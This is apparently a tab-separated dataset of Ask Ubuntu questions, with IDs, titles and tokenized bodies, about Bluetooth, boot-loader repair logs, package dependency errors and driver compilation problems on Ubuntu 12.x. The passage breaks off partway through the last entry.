227663	bluetooth not working after installing ubuntu 12.04	i 've tried hci0 reset . i 've also tried resetting my bios . i 've hard and soft unblocked . i 've tried uninstalling and reinstalling bluetooth . i 've tried installing blueman but it does not open . i 've tried running ubuntu on usb live mode , still bluetooth does not work . my bios is upto date . i 've updated ubuntu , tried unity reset , but nothing works . i still ca n't get my bluetooth working . it shows that it detects the hardware but still nothing . my system runs on 4gigs ram , 64 bit intel i3 m300 ,
227666	can i boot ubuntu from dvd	want to try running ubuntu from dvd without installing - is it possible ? trying to save some data from an old xp machine , and i am hoping to boot up with a ubuntu disk that will allow me to go in grab files on machine , and then install xp
227667	failed to fetch *.deb size mismatch , then packages with unmet dependencies	i recently bought the wonderfully looking and reviewed amnesia the dark descent and i 'm trying to install it . the first time i tried to download it , i had to stop in the middle of the download ( may have broken something ) . the second time i tried to download , at the end of the download it gave me the following error : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/amnesia/ubuntu/pool/main/a/amnesia/amnesia_1.2.1-0ubuntu2_i386.deb size mismatch now , whenever i try to download it , it gives me this error : the following packages have unmet dependencies : amnesia : depends : libalut0 ( > = 1.0.1 ) but it is not going to be installed depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10.3 is to be installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.8.0-3ubuntu9.1 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libopenal1 ( > = 1:1.13 ) but 1:1.13-4ubuntu3 is to be installed depends : libsdl1.2debian ( > = 1.2.10-1 ) but 1.2.14-6.4ubuntu3 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is to be installed depends : libxft2 ( > 2.1.1 ) but 2.2.0-3ubuntu2 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed i already searched the net and ran a few command line commands . ex : sudo dpkg -- configure -a sudo apt-get install -f or configure the software packages to download from main instead of the local uk server . but i 'm really not figuring out a solution . i have a fresh install of the latest lts ( 12.04 ) . the only non-standard thing so far is that i installed gnome-shell ( ? ) because i really ca n't stand unity . help would be much appreciated . i am currently more than entertained enough with world of goo and command & conquer , but i will want to play amnesia in the close future .
227668	mencoder ac3 has no sound when run with vlc	encoding video with mencoder ( mencoder svn r34540 ( ubuntu ) ) with ac3 codec from lavc , results in no sound on vlc 2.03 . the encoded video sounds ok on totem or mplayer but there is no sound on vlc . vlc plays ac3 sound from original video , but when i use -oac copy option with mencoder the result is the same . my os : ubuntu 12.04 x64
227670	unable to boot windows 7 after grub overwrote the windows bootsector	i have windows 7 on my machine and then installed ubuntu 12.04 using a live cd . i can see both windows 7 and ubuntu in the grub menu , but when i select windows 7 it shows a black screen for about 2 seconds and the returns to the grub menu . but if i select ubuntu it 's working fine . this is the contents of the boot-repair log : boot info script 0.61.full + boot-repair extra info [ boot-info november 20th 2012 ] ============================= boot info summary : =============================== = > grub2 ( v2.00 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ( , msdos6 ) /boot/grub . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : grub2 ( v1.99-2.00 ) boot sector info : grub2 ( v2.00 ) is installed in the boot sector of sda1 and looks at sector 388911128 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ( , msdos6 ) /boot/grub . no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 2048 . operating system : boot files : sda6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.10 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/i386-pc/core.img sda7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 206,848 146,802,687 146,595,840 7 ntfs / exfat / hpfs /dev/sda2 147,007,488 293,623,807 146,616,320 7 ntfs / exfat / hpfs /dev/sda3 293,623,808 332,820,613 39,196,806 7 ntfs / exfat / hpfs /dev/sda4 332,822,526 1,465,145,343 1,132,322,818 f w95 extended ( lba ) /dev/sda5 461,342,720 1,465,145,343 1,003,802,624 7 ntfs / exfat / hpfs /dev/sda6 332,822,528 453,171,199 120,348,672 83 linux /dev/sda7 453,173,248 461,338,623 8,165,376 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 f6ae2c13ae2bcb47 ntfs /dev/sda2 dc2273012272dfc6 ntfs /dev/sda3 1e76e43376e40d79 ntfs new volume /dev/sda5 5ed60acdd60aa57d ntfs /dev/sda6 9e70fd16-b48b-4f88-adcf-e443aef83124 ext4 /dev/sda7 52f3dd94-6be7-4a7b-a3ae-f43eb8810483 swap ================================ mount points : ================================= device mount_point type options /dev/sda6 / ext4 ( rw , errors=remount-ro ) =========================== sda6/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 9e70fd16-b48b-4f88-adcf-e443aef83124 else search -- no-floppy -- fs-uuid -- set=root 9e70fd16-b48b-4f88-adcf-e443aef83124 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_in insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-9e70fd16-b48b-4f88-adcf-e443aef83124 ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 9e70fd16-b48b-4f88-adcf-e443aef83124 else search -- no-floppy -- fs-uuid -- set=root 9e70fd16-b48b-4f88-adcf-e443aef83124 fi linux /boot/vmlinuz-3.5.0-17-generic root=uuid=9e70fd16-b48b-4f88-adcf-e443aef83124 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-17-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-9e70fd16-b48b-4f88-adcf-e443aef83124 ' { menuentry 'ubuntu , with linux 3.5.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-advanced-9e70fd16-b48b-4f88-adcf-e443aef83124 ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 9e70fd16-b48b-4f88-adcf-e443aef83124 else search -- no-floppy -- fs-uuid -- set=root 9e70fd16-b48b-4f88-adcf-e443aef83124 fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=9e70fd16-b48b-4f88-adcf-e443aef83124 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-recovery-9e70fd16-b48b-4f88-adcf-e443aef83124 ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 9e70fd16-b48b-4f88-adcf-e443aef83124 else search -- no-floppy -- fs-uuid -- set=root 9e70fd16-b48b-4f88-adcf-e443aef83124 fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=9e70fd16-b48b-4f88-adcf-e443aef83124 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 9e70fd16-b48b-4f88-adcf-e443aef83124 else search -- no-floppy -- fs-uuid -- set=root 9e70fd16-b48b-4f88-adcf-e443aef83124 fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 9e70fd16-b48b-4f88-adcf-e443aef83124 else search -- no-floppy -- fs-uuid -- set=root 9e70fd16-b48b-4f88-adcf-e443aef83124 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( on /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-f6ae2c13ae2bcb47 ' { insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 f6ae2c13ae2bcb47 else search -- no-floppy -- fs-uuid -- set=root f6ae2c13ae2bcb47 fi chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda6/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda6 during installation uuid=9e70fd16-b48b-4f88-adcf-e443aef83124 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=52f3dd94-6be7-4a7b-a3ae-f43eb8810483 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda6 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 162.831275940 = 174.838751232 boot/grub/grub.cfg 1 163.036647797 = 175.059267584 boot/initrd.img-3.5.0-17-generic 1 206.871749878 = 222.126850048 boot/vmlinuz-3.5.0-17-generic 1 163.036647797 = 175.059267584 initrd.img 1 163.036647797 = 175.059267584 initrd.img.old 1 206.871749878 = 222.126850048 vmlinuz 1 =============================== stderr messages : =============================== cat : write error : broken pipe cat : write error : broken pipe additional information : =================== log of boot-repair 2012-12-11__00h59 =================== boot-repair version : 3.195~ppa28~quantal boot-sav version : 3.195~ppa28~quantal glade2script version : 3.2.2~ppa45~quantal boot-sav-extra version : 3.195~ppa28~quantal boot-repair is executed in installed-session ( ubuntu 12.10 , quantal , ubuntu , x86_64 ) cpu op-mode ( s ) : 32-bit , 64-bit boot_image=/boot/vmlinuz-3.5.0-17-generic root=uuid=9e70fd16-b48b-4f88-adcf-e443aef83124 ro quiet splash vt.handoff=7 =================== os-prober : /dev/sda6 : the os now in use - ubuntu 12.10 currentsession : linux /dev/sda1 : windows 7 ( loader ) : windows : chain =================== blkid : /dev/sda1 : uuid= '' f6ae2c13ae2bcb47 '' type= '' ntfs '' /dev/sda2 : uuid= '' dc2273012272dfc6 '' type= '' ntfs '' /dev/sda3 : label= '' new volume '' uuid= '' 1e76e43376e40d79 '' type= '' ntfs '' /dev/sda5 : uuid= '' 5ed60acdd60aa57d '' type= '' ntfs '' /dev/sda6 : uuid= '' 9e70fd16-b48b-4f88-adcf-e443aef83124 '' type= '' ext4 '' /dev/sda7 : uuid= '' 52f3dd94-6be7-4a7b-a3ae-f43eb8810483 '' type= '' swap '' 1 disks with os , 2 os : 1 linux , 0 macos , 1 windows , 0 unknown type os . warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . =================== /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' =================== /etc/grub.d/ : drwxr-xr-x 2 root root 4096 oct 17 20:29 grub.d total 72 -rwxr-xr-x 1 root root 7541 oct 14 23:06 00_header -rwxr-xr-x 1 root root 5488 oct 4 15:00 05_debian_theme -rwxr-xr-x 1 root root 10891 oct 14 23:06 10_linux -rwxr-xr-x 1 root root 10258 oct 14 23:06 20_linux_xen -rwxr-xr-x 1 root root 1688 oct 11 19:40 20_memtest86+ -rwxr-xr-x 1 root root 10976 oct 14 23:06 30_os-prober -rwxr-xr-x 1 root root 1426 oct 14 23:06 30_uefi-firmware -rwxr-xr-x 1 root root 214 oct 14 23:06 40_custom -rwxr-xr-x 1 root root 216 oct 14 23:06 41_custom -rw-r -- r -- 1 root root 483 oct 14 23:06 readme =================== uefi/legacy mode : this installed-session is not in efi-mode . efi in dmesg . please report this message to yannubuntu @ gmail.com [ 0.000000 ] acpi : uefi 00000000bafe7000 0003e ( v01 dell qa09 00000002 ptl 00000002 ) [ 0.000000 ] acpi : uefi 00000000bafe6000 00042 ( v01 ptl combuf 00000001 ptl 00000001 ) [ 0.000000 ] acpi : uefi 00000000bafe3000 00256 ( v01 dell qa09 00000002 ptl 00000002 ) secureboot disabled . =================== partitions & disks : sda6 : sda , not-sepboot , grubenv-ok grub2 , grub-pc , update-grub , 64 , with-boot , is-os , not -- efi -- part , fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , apt-get , grub-install , with -- usr , fstab-without-usr , not-sep-usr , standard , farbios , . sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , bootmgr , is-winboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sda2 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda2 . sda3 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda3 . sda5 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda5 . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 2048 sectors * 512 bytes =================== parted -l : model : ata wdc wd7500bpkt-7 ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 106mb 75.2gb 75.1gb primary ntfs boot 2 75.3gb 150gb 75.1gb primary ntfs 3 150gb 170gb 20.1gb primary ntfs 4 170gb 750gb 580gb extended lba 6 170gb 232gb 61.6gb logical ext4 7 232gb 236gb 4181mb logical linux-swap ( v1 ) 5 236gb 750gb 514gb logical ntfs =================== parted -lm : byt ; /dev/sda:750gb : scsi:512:4096 : msdos : ata wdc wd7500bpkt-7 ; 1:106mb:75.2gb:75.1gb : ntfs : :boot ; 2:75.3gb:150gb:75.1gb : ntfs : : ; 3:150gb:170gb:20.1gb : ntfs : : ; 4:170gb:750gb:580gb : : : lba ; 6:170gb:232gb:61.6gb : ext4 : : ; 7:232gb:236gb:4181mb : linux-swap ( v1 ) : : ; 5:236gb:750gb:514gb : ntfs : : ; =================== mount : /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/dev/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=dev ) /dev/sda1 on /mnt/boot-sav/sda1 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda2 on /mnt/boot-sav/sda2 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda3 on /mnt/boot-sav/sda3 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda5 on /mnt/boot-sav/sda5 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 sda5 sda6 sda7 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : alarm ashmem autofs binder block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dri dvd dvdrw ecryptfs fb0 fb1 fd full fuse hpet input kmsg kvm log mapper mcelog mei mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sda4 sda5 sda6 sda7 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom v4l vga_arbiter vhost-net video0 zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /dev/sda6 ext4 57g 2.7g 51g 6 % / udev devtmpfs 1.9g 12k 1.9g 1 % /dev tmpfs tmpfs 770m 892k 769m 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1.9g 260k 1.9g 1 % /run/shm none tmpfs 100m 44k 100m 1 % /run/user /dev/sda1 fuseblk 70g 36g 35g 51 % /mnt/boot-sav/sda1 /dev/sda2 fuseblk 70g 66g 4.8g 94 % /mnt/boot-sav/sda2 /dev/sda3 fuseblk 19g 87m 19g 1 % /mnt/boot-sav/sda3 /dev/sda5 fuseblk 479g 436g 44g 92 % /mnt/boot-sav/sda5 =================== fdisk -l : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x1dc69d0b device boot start end blocks id system /dev/sda1 * 206848 146802687 73297920 7 hpfs/ntfs/exfat /dev/sda2 147007488 293623807 73308160 7 hpfs/ntfs/exfat /dev/sda3 293623808 332820613 19598403 7 hpfs/ntfs/exfat /dev/sda4 332822526 1465145343 566161409 f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 461342720 1465145343 501901312 7 hpfs/ntfs/exfat /dev/sda6 332822528 453171199 60174336 83 linux /dev/sda7 453173248 461338623 4082688 82 linux swap / solaris partition table entries are not in disk order =================== recommended repair recommended-repair this setting will reinstall the grub2 of sda6 into the mbr of sda . additional repair will be performed : unhide-bootmenu-10s grub-install ( grub ) 2.00-7ubuntu11 , grub-install ( grub ) 2 . reinstall the grub of sda6 into the mbr of sda installation finished . no error reported . grub-install /dev/sda : exit code of grub-install /dev/sda:0 update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 unhide grub boot menu in sda6/boot/grub/grub.cfg boot successfully repaired . you can now reboot your computer . the boot files of [ the os now in use - ubuntu 12.10 ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition )
227671	does a file reported as `` not a dynamic executable '' by 'ldd ' depend on other libraries ?	just making sure i got this right - i call ldd /path/to/executable and it returns `` not a dynamic executable '' . this means that it does n't depend on other libraries , correct ? if so , does it mean that it can be transferred to another ubuntu box without worrying about dependencies ?
227672	image viewer with mousewheel scrolling	is there an image viewer which allows the user to scroll the zoomed image using mouse wheel ? it 's a crucial functionality , which i miss in eog , gthumb etc ...
227677	can i sync folders with windows and linux ?	i use windows and now ubuntu and want to use ubuntu one to backup and sync files between them both so no matter what os i use , i have the latest synced files . is that possible ?
227678	no response at all from keyboard after sleep ( 12.10 ) sony vaio vgn-cs series	there 's no response from my keyboard after the lid is closed on my laptop . keystrokes are n't recognized and none of the light indicators ( num lock , caps lock , etc ) will show up . i 've tried a couple of the solutions that have been mentioned elsewhere , but nothing has worked for me . any suggestions ?
227681	how to scan with samsung scx-3200 over network	printer is detected and is working over my wireless network , but i do n't know how to detect scanner . simple-scan does n't see the device ...
227683	errors in terminal trying to install wireless drivers	i 'm trying to install the linux drivers for a d-link dwa-121 usb wireless adapter , found here : http : //www.dlink.com/ca/en/support/product/dwa-121-wireless-n-150-pico-usb-adapter . i 'm following the included instructions for terminal . when i get to the make command , i get error messages returned , and i ca n't proceed any further . have i missed something here ? i 'm fairly new to linux . could the drivers not be compatible ? i 'm running 12.10 32-bit . thanks ! these are the instructions for the linux drivers : tar zxvf rtl8192cu_linux_v2.0.1406.20110309.tar.gz cd rtl8192cu_linux_v2.0.1406.20110309 make su make install reboot below is what is returned : make arch=i386 cross_compile= -c /lib/modules/3.5.0-19-generic/build m=/home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-19-generic' cc [ m ] /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/core/rtw_cmd.o in file included from /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/include/drv_types.h:80:0 , from /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/core/rtw_cmd.c:24 : /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/include/rtw_xmit.h:353:24 : error : field ‘xmit_tasklet’ has incomplete type in file included from /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/include/drv_types.h:81:0 , from /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/core/rtw_cmd.c:24 : /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/include/rtw_recv.h:217:24 : error : field ‘recv_tasklet’ has incomplete type in file included from /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/include/drv_types.h:86:0 , from /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/core/rtw_cmd.c:24 : /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/include/rtw_io.h:35:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/matt/downloads/dwa121_linux_driver_20140620110309/rtl8192cu_linux_v2.0.1406.20110309/core/rtw_cmd.o ] error 1 make [ 1 ] : 